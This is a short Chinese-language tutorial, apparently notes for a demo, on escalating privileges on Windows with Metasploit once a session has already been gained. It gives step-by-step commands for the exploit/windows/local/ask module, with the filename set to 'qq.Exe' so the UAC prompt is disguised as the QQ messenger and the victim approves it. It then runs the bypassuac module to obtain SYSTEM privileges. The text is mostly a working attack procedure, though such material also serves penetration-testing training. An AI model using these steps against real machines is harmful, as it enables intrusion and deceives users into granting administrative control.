鲁达 提权大致也就3种方法
1. 提高程序运行权限级别
2. uac绕过
3. 提权漏洞
我这里先用第一种来演示
前提是msf已经获取到了 一个session
Getiud查看用户 是用户权限
Getsystem报错 看到是没法提权的
接下来 background退到后台
use exploit/windows/local/ask
加载模块
Show options
Set session 1
设置 session为 刚刚获取到得session
运行后会弹出 uac的拦截
Filename 可以设置文件的名字 伪装文件例如qq使得 用户点击确认
Set filename qq.Exe
接下来 run 运行 等待就可以了
接下来我们就可以看到靶机那边弹出用户控制的框
点击确定
在msf那边就可以获取到一个新的sesion
Getuid
还是用户权限
Getsystem
看到现在已经获取到了管理员权限
Msf绕过uac
use exploit/windows/local/bypassuac 再按几下tab键 可以看到绕过uac还是有很多模块和方法的 例如进程注入 vbs绕过等等
我这里直接用bypassuac模块
Show options
这里只需要设置个session就可以了
Set session 3
Run
执行成功
反弹回来一个session
Getuid
用户权限
Getsystem
Getuid
获取system权限成功